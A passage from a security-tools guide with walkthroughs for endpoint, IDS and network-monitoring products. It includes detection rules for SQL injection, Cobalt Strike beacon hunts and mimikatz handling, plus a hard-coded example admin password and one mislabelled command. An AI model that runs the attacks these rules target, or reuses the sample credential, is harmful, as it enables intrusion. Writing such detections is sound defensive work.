Sophos Endpoint Protection featuring Intercept X technology is widely regarded as one of the most technically advanced endpoint security solutions available, combining deep learning AI, anti-exploit technology, CryptoGuard (ransomware rollback), Root Cause Analysis, and Synchronized Security with Sophos Firewall. Sophos Central, the cloud-based management console, provides unified visibility and management across endpoints, servers, firewalls, and mobile devices from a single pane of glass.

Intercept X’s deep learning neural network is trained on hundreds of millions of malicious and benign samples — detecting never-before-seen malware with extraordinary accuracy and extremely low false positive rates. CryptoGuard uses novel file content analysis (rather than just process monitoring) to detect ransomware activity and automatically roll back affected files to their pre-encryption state even when encryption occurs over network shares (remote ransomware).

Key Features & Components

Feature / Component	Description
Deep Learning AI	Neural network malware classifier detecting novel malware with >99% accuracy and industry-leading false positive rates — trained on 100M+ real-world samples.
CryptoGuard (Ransomware Rollback)	Detects ransomware file encryption through content analysis; automatically restores affected files to pre-encryption state — including over network shares.
Exploit Prevention (28 Techniques)	Blocks ROP chains, heap spray, SEH overwrites, privilege escalation, ASEP injection, credentials theft from memory (Mimikatz patterns), and browser-based exploits.
Root Cause Analysis	Visual attack chain diagram showing the complete threat journey from initial vector through to payload delivery — with timestamps and evidence artefacts.
Synchronized Security (Security Heartbeat)	Endpoints share health status with Sophos Firewall in real time — firewall automatically isolates endpoints with Red heartbeat (active threat) from the network.
Sophos Central API	Full REST API for programmatic endpoint management, threat querying, isolation, scan initiation, and SIEM/SOAR integration.

Use Case Demonstration

Scenario

A corporate endpoint is compromised through a browser exploit. The attacker injects shellcode into a legitimate Windows process and attempts to establish a reverse shell. Sophos Intercept X detects the process injection via its anti-exploit engine, terminates the threat, and triggers Synchronized Security to isolate the endpoint from the network.

Step-by-Step Command Walkthrough

# ── Sophos Central REST API — incident investigation and response ─────────────
# Step 1 — Authenticate and get access token
TOKEN=$(curl -s -X POST 'https://id.sophos.com/api/v2/oauth2/token' \
  -d 'grant_type=client_credentials&client_id=CLIENT_ID
      &client_secret=CLIENT_SECRET&scope=token' \
  | jq -r '.access_token')

TENANT=$(curl -s 'https://api.central.sophos.com/whoami/v1' \
  -H "Authorization: Bearer $TOKEN" | jq -r '.id')

# Step 2 — List endpoints with active threats (Red heartbeat)
curl -s \
  'https://api.central.sophos.com/endpoint/v1/endpoints?
  healthStatus=bad&fields=hostname,ipAddresses,health' \
  -H "Authorization: Bearer $TOKEN" \
  -H "X-Tenant-ID: $TENANT"

# Step 3 — Retrieve Root Cause Analysis for alert
curl -s \
  "https://api.central.sophos.com/endpoint/v1/alerts/$ALERT_UUID/details" \
  -H "Authorization: Bearer $TOKEN" \
  -H "X-Tenant-ID: $TENANT"

# Step 4 — Network-isolate the compromised endpoint
curl -s -X POST \
  "https://api.central.sophos.com/endpoint/v1/endpoints/$ENDPOINT_UUID/isolate" \
  -H "Authorization: Bearer $TOKEN" \
  -H "X-Tenant-ID: $TENANT"

# Step 5 — Trigger full disk scan
curl -s -X POST \
  "https://api.central.sophos.com/endpoint/v1/endpoints/$ENDPOINT_UUID/scans" \
  -H "Authorization: Bearer $TOKEN" \
  -H "X-Tenant-ID: $TENANT"

Outcome & Analysis

Sophos Intercept X detects the shellcode injection into svchost.exe via its Heap Spray exploit prevention trigger, terminates the injected thread within milliseconds, and sets the endpoint’s Security Heartbeat to Red. Sophos Firewall receives the Red heartbeat and automatically isolates the endpoint from all network segments except for Sophos Central communications. The Root Cause Analysis report reveals the complete attack chain — browser exploit via CVE-2024-XXXX → shellcode in svchost.exe → attempted C2 connection — all visible within 90 seconds of the initial compromise.

Overview

CrowdStrike Falcon is a cloud-native, AI-powered endpoint detection and response (EDR) and extended detection and response (XDR) platform that fundamentally changed the endpoint security architecture by moving intelligence to the cloud. The Falcon sensor is lightweight (4-5MB), streams all endpoint telemetry to CrowdStrike’s cloud for AI analysis rather than performing resource-intensive local processing, and provides detection and prevention capabilities without requiring signature updates.

The Threat Graph — CrowdStrike’s proprietary cloud-native graph database — processes over 1 trillion security events per week across all Falcon-protected endpoints globally, using graph analytics to identify attack patterns, actor TTPs, and lateral movement. Falcon provides sub-10-second prevention at the endpoint and adversary attribution through CrowdStrike’s deep threat intelligence, mapping attacks to specific named threat actors (FANCY BEAR, LAZARUS GROUP, CARBON SPIDER, etc.).

Key Features & Components

Feature / Component	Description
AI-Powered Prevention	Machine learning models trained on the Threat Graph detect and block malicious processes at pre-execution with near-zero false positives — no signatures or updates needed.
Falcon Insight (EDR)	Records every process, file write, network connection, and registry event in real time — enabling retroactive threat hunting and forensic investigation across any time window.
Real-Time Response (RTR)	Interactive remote shell access to any Falcon-managed endpoint globally — enabling live forensic investigation, artefact collection, and remediation without physical access.
Adversary Attribution	Maps detections to specific named threat actors (APT groups, eCrime groups) with TTP profiles and active campaign intelligence — enabling context-aware response.
Falcon Fusion (SOAR)	Built-in workflow automation engine triggered by Falcon detections — automates response playbooks including isolation, ticketing, notification, and threat intelligence enrichment.
Falcon X (Threat Intelligence)	Automated malware analysis sandbox, threat actor intelligence, and custom indicators of compromise (IOC) management integrated with the Falcon platform.

Use Case Demonstration

Scenario

CrowdStrike Falcon’s AI detects a credential theft attack on a corporate endpoint — a Mimikatz-like tool running in memory attempting to dump LSASS credentials. The SOC analyst uses Real-Time Response to investigate the live endpoint, collect forensic artefacts, and contain the threat without interrupting the user’s session.

Step-by-Step Command Walkthrough

# ── CrowdStrike Falcon API (Python SDK — falconpy) ────────────────────────────
from falconpy import Hosts, RealTimeResponse, Detects

# Authenticate
hosts = Hosts(client_id='CLIENT_ID', client_secret='CLIENT_SECRET')
rtr   = RealTimeResponse(client_id='CLIENT_ID', client_secret='CLIENT_SECRET')

# Step 1 — Find endpoint involved in detection
response = hosts.query_devices_by_filter(
    filter="hostname:'CORP-LAPTOP-042'",
    limit=1
)
device_id = response['body']['resources'][0]

# Step 2 — Initiate Real-Time Response session
session = rtr.init_session(device_id=device_id,
                           origin='SOC-Investigation-INC-2024-0517')
session_id = session['body']['resources'][0]['session_id']

# Step 3 — Run investigation commands on live endpoint
# List running processes
rtr.run_command(session_id=session_id,
    command_string='ps',
    base_command='ps')

# Check LSASS process status
rtr.run_admin_command(session_id=session_id,
    command_string='netstat -an | findstr ESTABLISHED')

# Download suspicious file from endpoint
rtr.run_command(session_id=session_id,
    command_string='get C:\\Temp\\mimikatz64.exe')

# Step 4 — Contain the host (network isolation)
hosts.perform_action(action_name='contain', ids=[device_id])

# Step 5 — Verify containment
status = hosts.get_device_details(ids=[device_id])
print(status['body']['resources'][0]['status'])  # -> 'contained'

Outcome & Analysis

Falcon AI detects the Mimikatz credential harvesting attempt within 500 milliseconds via process injection pattern matching in the Threat Graph, blocking the LSASS dump before credentials are extracted. The SOC analyst uses Real-Time Response to download the attack tool, confirm no credentials were successfully dumped, and contain the endpoint with one API call. Falcon Fusion simultaneously opens a ServiceNow incident ticket, notifies the security team via Slack, and enriches the detection with Falcon X threat intelligence — identifying the tooling as associated with the INDRIK SPIDER eCrime group.

Overview

Symantec Endpoint Protection (SEP), now part of Broadcom after a $10.7 billion acquisition in 2019, is one of the most widely deployed enterprise endpoint security platforms protecting over 175 million endpoints globally. SEP uses a layered defence architecture including the SONAR behavioural engine, Insight file reputation, network IPS, application and device control, and memory exploit mitigation — all managed through the Symantec Endpoint Protection Manager (SEPM) or Symantec Endpoint Security (SES) cloud.

Symantec’s Insight reputation engine evaluates the trustworthiness of files based on prevalence (how many Symantec users have the file), age (how recently it appeared), download source, and digital signature status. Files with low prevalence and short age — the hallmark of targeted, novel malware — are treated with high suspicion regardless of whether any signature matches. SEPM provides centralised policy management for groups, compliance reporting, and a REST API for SIEM integration.

Key Features & Components

Feature / Component	Description
SONAR Behavioural Engine	Real-time process behaviour monitoring identifying malicious action patterns — detecting zero-day and fileless threats through behavioural signatures.
Insight File Reputation	Cloud reputation scoring based on prevalence, age, download source, and signing status — treating rare, newly-appeared files as high-risk without needing a signature.
Network IPS (Host-Based)	Inspects all network traffic to and from the endpoint — blocking exploit delivery, C2 communication, lateral movement (e.g., EternalBlue attempts), and network-based attacks.
Application & Device Control	Granular policies controlling which applications can execute, what USB devices can be used, what system resources applications can access, and application launch whitelisting.
SEPM REST API	Full REST API for programmatic policy management, endpoint queries, threat reporting, and SIEM/SOAR integration.
Cloud Console (SES)	Modern cloud-based SEP management providing real-time threat dashboards, adaptive detection tuning, and endpoint isolation capabilities.

Use Case Demonstration

Scenario

An enterprise security team uses SEPM to enforce application whitelisting across 200 critical financial servers — ensuring only approved financial applications and system binaries can execute. When a ransomware dropper attempts to run following a phishing compromise, application control blocks it immediately.

Step-by-Step Command Walkthrough

# ── SEPM REST API — endpoint policy and threat management ────────────────────
# Step 1 — Authenticate to SEPM API
curl -k -s -X POST \
  'https://sepm.corp.local:8446/sepm/api/v1/identity/authenticate' \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"SEPMAdmin2024!"}'
# Response: {"token":"Bearer TOKEN", "tokenExpiry":3600}

# Step 2 — Create application whitelist policy
# SEPM Console > Policies > Application and Device Control > New Policy
# Mode: Test (log only) initially, then switch to Block after tuning
#
# Allowed: C:\Program Files\FinApp\*.exe (SHA-256 hash list)
# Allowed: C:\Windows\System32\*.exe (signed by Microsoft — publisher rule)
# Allowed: C:\Program Files\Common Files\*.dll
# Block ALL others: 'Application not on whitelist — block and log'

# Step 3 — Assign whitelist policy to Financial Servers group
curl -k -s -X PUT \
  'https://sepm.corp.local:8446/sepm/api/v1/groups/GROUP_ID/policies' \
  -H 'Authorization: Bearer TOKEN' \
  -H 'Content-Type: application/json' \
  -d '[{"policyId":"POLICY_UUID","policyType":"app_and_device_control"}]'

# Step 4 — Query application control violation log
curl -k -s \
  'https://sepm.corp.local:8446/sepm/api/v1/computer-status/
  appcontrol/violations?lastUpdated=2024-05-17T00:00:00' \
  -H 'Authorization: Bearer TOKEN'

# Step 5 — Ransomware dropper blocked (log entry example)
# {
#   'hostname': 'FIN-SERVER-07',
#   'application': 'C:\Users\svc_backup\AppData\Roaming\updater.exe',
#   'sha256': 'a1b2c3d4...', 'action': 'Blocked',
#   'rule': 'Application not on approved list',
#   'timestamp': '2024-05-17T14:23:07Z'
# }

Outcome & Analysis

The application whitelist policy blocks the ransomware dropper (updater.exe) from executing on FIN-SERVER-07. The violation is logged in SEPM and an alert is sent to the SIEM. Because the dropper cannot execute, no ransomware encryption activity, no persistence mechanism, and no C2 connection is established. The SEPM console confirms 14 additional blocked execution attempts over the following 30 minutes from the same ransomware campaign — all blocked on all 200 financial servers by the whitelist policy.

Section 3: Network Security

This section covers 10 network security tools, providing in-depth analysis of each product’s architecture, capabilities, and practical application in enterprise security environments.

Overview

Snort is the world’s most widely deployed open-source Network Intrusion Detection and Prevention System (IDS/IPS), originally created by Martin Roesch in 1998 and now developed and maintained by Cisco. Snort analyses network traffic in real time using a rule-based detection engine that supports content matching, protocol decoding, port and IP specifications, flow tracking, and logical operators. With over 70,000 community-contributed and commercial Snort Subscriber rules, Snort detects exploits, port scans, protocol anomalies, malware C2 traffic, and policy violations.

Snort 3 (released 2021) is a complete architectural redesign supporting multi-threaded packet processing for 10Gbps+ environments, a streamlined Lua configuration language, an improved plugin architecture, and better integration with modern security infrastructure. Snort can run in three modes: sniffer (packet display), packet logger (write to disk), and NIDS/NIPS (detection and prevention) — with inline IPS mode enabling real-time packet dropping.

Key Features & Components

Feature / Component	Description
Rule-Based Detection Engine	Flexible rule language with header options (src/dst IP, ports, protocol) and body options (content patterns, regex, byte tests, flow keywords).
Protocol Decoders	Decodes 60+ protocols including HTTP, SMTP, FTP, DNS, SMB, SSH, and TLS at the application layer for deep packet inspection.
Preprocessors / Inspectors	Stream reassembly, HTTP normalisation, and portscan detection normalise traffic to defeat common evasion techniques before rule matching.
Inline IPS Mode	Deployed inline with network traffic (via NFQ, IPFW, or AF_PACKET), enabling real-time packet dropping for confirmed malicious traffic.
Snort Subscriber Ruleset	Commercial daily-updated rule feed from Cisco Talos providing 24-48 hour advance coverage over the free community rules for emerging CVEs.
Alert Outputs	Syslog, unified2 binary (for Barnyard2/SIEM), JSON, CEF, and database outputs — integrating with Splunk, Elastic, and other SIEM platforms.

Use Case Demonstration

Scenario

A SOC deploys Snort 3 in IPS inline mode at the network perimeter. A custom rule is written to detect and block SQL injection attempts targeting the web application tier. The rule is tested, deployed, and validated against live attack traffic.

Step-by-Step Command Walkthrough

# ── Snort 3 configuration (/etc/snort/snort.lua) key sections ────────────────
ips = {
  enable_builtin_rules = true,
  mode = 'inline',           -- IPS mode: drop malicious packets
  rules = [[
    include /etc/snort/rules/local.rules
    include /etc/snort/rules/snort3-community.rules
    include /etc/snort/rules/snort-subscriber.rules
  ]]
}
network = { checksum_eval = 'all' }
alert_fast = { file = true, packet = false, limit = 10 }
unified2 = { filename = 'snort.u2', limit = 512 }

# ── Custom local rule — detect SQL injection (Union Select) ───────────────────
# File: /etc/snort/rules/local.rules
alert http any any -> $HTTP_SERVERS $HTTP_PORTS (
  msg:"SQL Injection Attempt - UNION SELECT";
  flow:to_server,established;
  http_uri;
  content:"UNION",nocase;
  content:"SELECT",nocase,distance:0;
  pcre:"/UNION\s+ALL\s+SELECT|UNION\s+SELECT/i";
  classtype:web-application-attack;
  priority:1;
  sid:9000001; rev:3;
)

drop http any any -> $HTTP_SERVERS $HTTP_PORTS (
  msg:"SQL Injection BLOCKED - UNION SELECT";
  flow:to_server,established;
  http_uri;
  content:"UNION",nocase;
  content:"SELECT",nocase,distance:0;
  pcre:"/UNION\s+SELECT/i";
  classtype:web-application-attack;
  sid:9000002; rev:1;
)

# ── Start Snort 3 in IPS inline mode on eth0 ─────────────────────────────────
snort -c /etc/snort/snort.lua -i eth0 \
  -A alert_fast --daq-dir /usr/lib/daq \
  --daq nfq --daq-var queue=0 -Q

Outcome & Analysis

Snort IPS drops 100% of packets matching the SQL injection signature, logging 312 blocked attack attempts from 4 distinct source IPs within the first 2 hours. Application response time is unaffected by inline inspection (<0.2ms added latency on the test VLAN). The unified2 log is ingested by Barnyard2 into Splunk, where a dashboard shows the attack timeline, source IPs, and targeted endpoints — enabling the SOC to simultaneously block the IPs at the perimeter firewall for defence-in-depth.

Overview

SolarWinds is a comprehensive IT management platform providing network performance monitoring (NPM), log and event management, network configuration management (NCM), IP address management (IPAM), and security event management (SEM/SIEM). The SolarWinds Orion Platform integrates multiple modules into a unified web console providing complete network and infrastructure visibility. Despite the high-profile 2020 SUNBURST supply chain attack affecting Orion versions 2019.4 through 2020.2.1, SolarWinds products remain widely deployed in enterprise environments after comprehensive security remediations.

From a network security perspective, SolarWinds NPM’s NetFlow Traffic Analyzer (NTA) is particularly valuable for threat detection — analysing NetFlow, sFlow, J-Flow, and IPFIX data to detect anomalous traffic patterns, data exfiltration, DDoS attacks, and unusual east-west traffic. The Security Event Manager (SEM) provides SIEM capabilities with over 700 built-in correlation rules, active response automation, and integration with third-party threat intelligence feeds.

Key Features & Components

Feature / Component	Description
Network Performance Monitor (NPM)	Monitors 1,100+ device types via SNMP, WMI, ICMP — providing real-time latency, packet loss, bandwidth utilisation, and availability dashboards.
NetFlow Traffic Analyzer (NTA)	Processes NetFlow/sFlow/IPFIX data from routers and switches — detecting anomalous bandwidth usage, unusual destination IPs, and traffic pattern changes.
Security Event Manager (SEM)	SIEM with 700+ correlation rules, threat intelligence integration, active response automation, and user behaviour analytics.
Network Configuration Manager (NCM)	Tracks and enforces network device configuration baselines — alerting on unauthorized changes and providing one-click rollback for Cisco, Juniper, and other vendors.
SWQL (Query Language)	SolarWinds Query Language for creating custom queries, reports, and dashboards across all collected data — similar to SQL for the Orion database.
Active Alerts & Automation	Configurable alert thresholds that trigger automated responses: SNMP traps, email notifications, script execution, or SNMP interface shutdown.

Use Case Demonstration

Scenario

A network security engineer uses SolarWinds NTA to detect a data exfiltration event — an internal host transferring unusually large volumes of data to an unknown external IP during off-business hours. The SWQL query surfaces the anomaly and triggers an automated alert.

Step-by-Step Command Walkthrough

# ── Configure NetFlow export on Cisco router ──────────────────────────────────
ip flow-export version 9
ip flow-export destination 10.0.0.100 2055   # SolarWinds NTA IP
ip flow-cache timeout active 1
ip flow-cache timeout inactive 15
!
interface GigabitEthernet0/0
 ip flow ingress
 ip flow egress

# ── SWQL query: Detect large external data transfers (last 2h) ────────────────
SELECT TOP 20
  N.Caption                        AS HostName,
  F.SourceIPAddress                AS SourceIP,
  F.DestIPAddress                  AS DestinationIP,
  F.DestPort                       AS Port,
  ROUND(SUM(F.OutBytes)/1073741824.0, 2) AS GB_Sent,
  COUNT(*)                         AS FlowCount
FROM Orion.NetFlow.Flows F
INNER JOIN Orion.Nodes N ON F.NodeID = N.NodeID
WHERE F.DateTime > GETDATE() - 2/24.0
  AND F.DestIPAddress NOT LIKE '10.%'
  AND F.DestIPAddress NOT LIKE '192.168.%'
  AND F.DestIPAddress NOT LIKE '172.16.%'
  AND (F.OutBytes + F.InBytes) > 1073741824  -- > 1GB
GROUP BY N.Caption, F.SourceIPAddress, F.DestIPAddress, F.DestPort
ORDER BY GB_Sent DESC

# ── Alert configuration: Trigger on >10GB external transfer ──────────────────
# SolarWinds Alert Manager > New Alert:
# Condition: (SUM OutBytes to non-RFC1918 IP) > 10,737,418,240 (10GB)
# Evaluated every: 15 minutes
# Actions:
#   1. Send email to soc@corp.com with source/destination details
#   2. Execute script: quarantine_host.py ${HostName}
#   3. SNMP Set: shutdown offending interface (if confirmed)

Outcome & Analysis

SolarWinds NTA detects DESKTOP-FINANCE-07 transferring 487GB to 185.220.101.35 (a known Tor exit node) via HTTPS port 443 between 02:00 and 04:30 AM. The SWQL query surfaces the anomaly in the morning shift dashboard. The automated alert triggers a quarantine script that blocks the host at the access switch layer within 2 minutes of threshold exceedance. Forensic investigation reveals the host was infected with a custom data stealer — the NTA detection containing the exfiltration before the full 2TB target file set was transferred.

Overview

Nagios is one of the oldest and most widely deployed open-source IT infrastructure monitoring platforms, providing continuous monitoring of hosts, services, network devices, and applications. Originally released in 1999 (as NetSaint), Nagios Core powers the monitoring engine, while Nagios XI provides a commercial web interface with configuration wizards, capacity planning, and enhanced reporting. The Nagios Exchange hosts 4,000+ community-contributed plugins covering virtually every monitoring use case.

From a security operations perspective, Nagios is used for continuous availability monitoring (detecting outages that may indicate DDoS or service disruption attacks), alerting on anomalous service states that could indicate compromise or misconfiguration, monitoring security-critical services (SSL certificate expiry, SSH availability, firewall status), and triggering automated response actions via event handlers when security thresholds are exceeded.

Key Features & Components

Feature / Component	Description
Host & Service Checks	Monitors availability and performance of hosts, TCP/UDP services, web applications, databases, and custom scripts via 4,000+ plugins.
NRPE (Remote Plugin Executor)	Executes monitoring plugins securely on remote hosts via SSL — enabling CPU, memory, disk, log, and process monitoring without SNMP.
Event Handlers	Executes automated scripts on state changes — enabling auto-restart of failed services, firewall rule creation, or SIEM notifications on threshold breaches.
Passive Checks (NSCA)	Accepts externally-submitted check results from scripts, SNMP trap translators, and distributed monitoring nodes.
Contact Groups & Escalations	Tiered notification routing — initial alerts to L1 analysts, escalating to L2/L3 if unacknowledged within configurable timeframes.
Performance Data (PNP4Nagios)	Stores historical check performance data in RRD databases for trend graphing, capacity planning, and anomaly detection.

Use Case Demonstration

Scenario

A security operations team uses Nagios to monitor web servers in the DMZ for availability and response time. Nagios detects that a DMZ web server is responding extremely slowly — an early indicator of a volumetric DDoS attack — and immediately triggers an event handler that activates upstream rate limiting on the load balancer.

Step-by-Step Command Walkthrough

# ── Nagios host and service definitions for DMZ monitoring ───────────────────
# File: /etc/nagios/conf.d/dmz_servers.cfg
define host {
  host_name         web01.dmz.corp.local
  address           10.20.30.11
  check_command     check-host-alive
  max_check_attempts 3
  check_interval    1
  contact_groups    soc_team
}

define service {
  host_name             web01.dmz.corp.local
  service_description   HTTP Response Time
  check_command         check_http!-w 1.5 -c 4.0 -t 10 -u /health
  max_check_attempts    3
  check_interval        1
  event_handler         enable_ratelimit!web01.dmz.corp.local
  contact_groups        soc_team
  notification_options  w,c,r
}

define service {
  host_name             web01.dmz.corp.local
  service_description   SSL Certificate Expiry
  check_command         check_http!-ssl -C 30,14
  # Warn at 30 days remaining, Critical at 14 days
  check_interval        60
}

# ── Event handler script: enable_ratelimit.sh ─────────────────────────────────
#!/bin/bash
# Called when service enters WARNING or CRITICAL HARD state
SERVICESTATE=$1
SERVICESTATETYPE=$2
HOSTNAME=$3

if [ "$SERVICESTATE" = "CRITICAL" ] && [ "$SERVICESTATETYPE" = "HARD" ]; then
  # Activate rate limiting on load balancer via API
  curl -s -X POST https://lb.corp.local/api/v1/ratelimit/enable \
    -H 'Authorization: Bearer LB_API_TOKEN' \
    -d "{\"target\":\"$HOSTNAME\",\"limit\":100}"
  logger -t nagios "Rate limiting activated for $HOSTNAME"
fi

Outcome & Analysis

Nagios detects web01’s HTTP response time exceeding 4 seconds (Critical threshold) due to a 40 Gbps SYN flood. The event handler activates rate limiting at the load balancer within 10 seconds of the HARD CRITICAL state — reducing per-source IP attack traffic by 94%. Simultaneously, the SOC team receives a PagerDuty alert with the service check output, timing, and affected host. The DDoS is contained within 60 seconds of detection without manual intervention.

Overview

Security Onion is a free, open-source Linux distribution purpose-built for threat hunting, network security monitoring (NSM), enterprise log management, and intrusion detection. Developed and maintained by Security Onion Solutions, it integrates a comprehensive stack of best-of-breed open-source tools pre-configured to work together: Zeek (network metadata extraction), Suricata (signature-based IDS/IPS), the Elastic Stack (Elasticsearch, Logstash, Kibana for log indexing and visualisation), TheHive (incident case management), Playbook (detection engineering), and Fleet (osquery endpoint management).

Security Onion can be deployed in three modes: standalone (single-node for smaller environments), distributed (manager + sensors for enterprise-scale), and cloud (native support for AWS and Azure deployments). The Security Onion Console (SOC) provides a unified analyst interface with alert triaging, PCAP extraction, hunt queries, and case management — eliminating the need to switch between multiple tools.

Key Features & Components

Feature / Component	Description
Zeek (Network Metadata Engine)	Generates structured logs for DNS, HTTP, HTTPS, FTP, SMB, Kerberos, SSH, TLS, and 40+ protocols — creating a complete audit trail of all network communications.
Suricata IDS/IPS	Signature-based detection using Emerging Threats Open + ET Pro + custom rulesets — complementing Zeek’s behavioural visibility with known-indicator matching.
Elastic Stack Integration	All Zeek, Suricata, syslog, and osquery data indexed in Elasticsearch with millisecond search response times across terabytes of security telemetry.
PCAP Evidence	Full or selective packet capture available on all sensors — analysts can extract full PCAPs for any Zeek-logged session directly from the console.
Fleet (osquery)	Manages osquery agents on endpoints providing real-time host-based threat hunting — bridging network and endpoint visibility in a single platform.
TheHive Integration	Creates and manages incident cases from Security Onion alerts — linking network evidence, PCAP captures, and analyst notes in structured case files.

Use Case Demonstration

Scenario

A threat hunter uses Security Onion to investigate a suspected Cobalt Strike C2 beacon observed as regular outbound HTTPS connections at consistent intervals from an internal workstation. The analyst queries Zeek logs, examines connection metadata, extracts PCAP evidence, and creates a TheHive incident.

Step-by-Step Command Walkthrough

# ── Hunt query in Security Onion Console (Kibana/SOC) ────────────────────────
# STEP 1: Hunt for Cobalt Strike beaconing pattern in Zeek ssl logs
# Security Onion Console > Hunt > Lucene query:
event.module:zeek AND event.dataset:zeek.ssl AND
  destination.ip:* AND NOT destination.ip:10.0.0.0/8
  AND NOT destination.ip:192.168.0.0/16
  AND source.ip:10.10.10.50

# STEP 2: Elasticsearch aggregation to measure beacon regularity
GET logs-zeek.conn-*/_search
{
  "query": {
    "bool": {
      "must": [
        {"match": {"source.ip": "10.10.10.50"}},
        {"match": {"destination.port": 443}}
      ]
    }
  },
  "aggs": {
    "by_dest": {
      "terms": {"field": "destination.ip", "size": 10},
      "aggs": {
        "over_time": {
          "date_histogram": {"field": "@timestamp",
                             "fixed_interval": "1m"}
        }
      }
    }
  }
}
# Result: 51.79.xx.xx contacted 58 times in 1hr with 62s ± 3s jitter
# Highly regular interval = beacon characteristic

# STEP 3: Check JA3 fingerprint (Cobalt Strike default: a0e9f5d64349fb13191bc781f81f42e1)
event.module:zeek AND tls.client.ja3:a0e9f5d64349fb13191bc781f81f42e1

# STEP 4: Extract full PCAP for the session
# SOC Console > Hunt > right-click source IP > Extract PCAP
# Download: 10.10.10.50_51.79.xx.xx_443_session.pcap

# STEP 5: Correlate with Suricata alert
event.module:suricata AND alert.signature:'ET MALWARE CobaltStrike Beacon'
  AND source.ip:10.10.10.50

# STEP 6: Create TheHive case
# SOC > Alert > Escalate to Case > Assign: IR Team | Priority: P1

Outcome & Analysis

Security Onion confirms Cobalt Strike beaconing: Zeek logs show 10.10.10.50 making 58 connections to 51.79.xx.xx over 60 minutes at a 62-second interval (± 3 seconds jitter), matching Cobalt Strike’s default Sleep Timer configuration. The JA3 fingerprint matches the known Cobalt Strike default. Suricata raises a confirmed ‘ET MALWARE CobaltStrike Beacon’ alert. The PCAP is extracted and added to the TheHive case — providing the IR team with network-level forensic evidence for endpoint investigation and threat actor attribution.

Overview

Tcpdump is the gold-standard command-line packet analyser for Unix-like systems, using the libpcap library to capture raw network packets directly from interfaces. Pre-installed on most Linux distributions and macOS, tcpdump requires no installation on production servers — making it the first-choice tool for rapid network investigation without adding new software to sensitive systems. On Windows, the equivalent WinDump uses WinPcap/Npcap.

Tcpdump’s Berkeley Packet Filter (BPF) syntax enables kernel-level packet filtering — only matching packets are copied to userspace, dramatically reducing CPU overhead compared to capturing all traffic and filtering in application code. Combined with tools like Wireshark (for GUI analysis), tshark (for automated processing), or custom Python/Perl scripts for real-time analysis, tcpdump forms the foundation of many network forensics and threat hunting workflows.

Key Features & Components

Feature / Component	Description
Berkeley Packet Filter (BPF)	Kernel-level filtering expressions capturing only matching packets — host, port, protocol, MAC, VLAN, payload content — with minimal CPU and memory overhead.
PCAP Output	Writes raw captures to industry-standard PCAP format readable by Wireshark, Zeek, Snort, Suricata, and any security or analysis tool.
Protocol Decoding	Displays decoded protocol fields for Ethernet, IP, TCP, UDP, ICMP, ARP, DNS, HTTP, and dozens more in human-readable or verbose format.
Remote Capture via SSH	Streams capture data from remote servers via SSH pipe directly into a local Wireshark instance — enabling real-time analysis without storing files on the server.
File Rotation	Rotates capture files by time (-G) or size (-C) with strftime timestamp naming — enabling long-running captures without filling disk.
Interface Flexibility	Captures from physical NICs, VLANs (802.1Q), tunnels (GRE, VXLAN), wireless interfaces (in monitor mode), and virtual interfaces.

Use Case Demonstration

Scenario

A security engineer investigating a suspected DNS tunnelling exfiltration event on a production server uses tcpdump to capture and analyse DNS traffic in real time — identifying anomalously long query names characteristic of data exfiltration via DNS without installing any new tools.

Step-by-Step Command Walkthrough

# ── CAPTURE: Save all DNS traffic to rotating PCAP files ─────────────────────
sudo tcpdump -i eth0 \
  -w /tmp/dns_capture_%Y%m%d_%H%M%S.pcap \
  -G 300 -C 100 \
  'udp port 53 or tcp port 53'
# -G 300 = rotate every 5 minutes   -C 100 = rotate at 100MB

# ── LIVE ANALYSIS: Show DNS queries with verbose decode ───────────────────────
sudo tcpdump -i eth0 -nn -vvv 'udp port 53'

# ── DETECTION: Flag anomalously long DNS query names (>50 chars) ──────────────
sudo tcpdump -i eth0 -nn \
  'udp port 53 and udp[10:2] & 0x7800 = 0x0000'
# Captures DNS queries (QR bit = 0)

# Use tshark for automated long-query detection
sudo tshark -i eth0 -Y 'dns.qry.type == 1 and dns.qry.name.len > 50' \
  -T fields -e frame.time -e ip.src -e dns.qry.name

# ── EVIDENCE: Capture SMB for lateral movement detection ──────────────────────
sudo tcpdump -i eth0 \
  -w /tmp/smb_capture.pcap \
  'tcp port 445 or tcp port 139'

# ── REMOTE CAPTURE: Stream to local Wireshark via SSH ────────────────────────
ssh -C root@prod-server.corp.local \
  'tcpdump -i eth0 -s 0 -w - not port 22' | wireshark -k -i -

# ── DETECT SYN SCAN: Show only TCP SYN packets ────────────────────────────────
sudo tcpdump -i eth0 -nn \
  'tcp[tcpflags] == tcp-syn'

# ── EXTRACT: Tshark field extraction for automated analysis ──────────────────
tshark -r /tmp/dns_capture.pcap \
  -Y 'dns.qry.name' \
  -T fields -e dns.qry.name \
  | awk '{print length($0), $0}' | sort -rn | head -20

Outcome & Analysis

Tcpdump’s tshark DNS query length analysis identifies 10.10.50.33 sending queries with 63-character hexadecimal subdomain labels to a single external domain — the classic signature of Iodine DNS tunnelling. The automated detection flags the host within 90 seconds of the investigation starting. The PCAP file confirms 2.3GB of data exfiltration over 7 hours via DNS tunnel. The server is isolated immediately, and the PCAP evidence is preserved for forensic analysis and potential legal proceedings.

Overview

Fortinet FortiGate is the world’s most deployed network security platform, with over 680,000 customers across all industry sectors. FortiGate provides a comprehensive Next-Generation Firewall (NGFW) and Unified Threat Management (UTM) solution combining stateful firewalling, SSL/TLS deep inspection, intrusion prevention (IPS), application control, web filtering, antivirus, anti-botnet, DNS security, data loss prevention (DLP), and SD-WAN in a single platform. FortiGate appliances are powered by purpose-built security processors (NP7 network processors, CP9 content processors, and SPU SoCs) that deliver multi-Gbps security inspection without performance degradation.

The FortiGuard Labs threat intelligence network — updated every 15 minutes — provides URL categorisation, application signatures, IPS signatures, antivirus, and IP reputation data across all FortiGate deployments globally. Fortinet’s Security Fabric architecture integrates FortiGate with FortiAnalyzer (SIEM), FortiManager (centralised management), FortiSIEM, FortiSOAR, and 250+ third-party tools via an open API fabric.

Key Features & Components

Feature / Component	Description
NGFW + Application Control	Identifies 5,000+ applications regardless of port, protocol, or encryption — enabling policy enforcement by application identity rather than port number.
SSL/TLS Deep Inspection	Decrypts, inspects for threats, and re-encrypts HTTPS, SMTPS, IMAPS, and other TLS-wrapped traffic — preventing threats hidden in encrypted channels.
FortiGuard IPS	Real-time IPS signatures updated every 15 minutes covering 10,000+ CVE-mapped vulnerabilities across servers, browsers, databases, and network devices.
DNS Security	Blocks DNS queries to malicious domains (C2, phishing, DGA domains) via FortiGuard DNS sinkholing — preventing C2 communication and malware distribution.
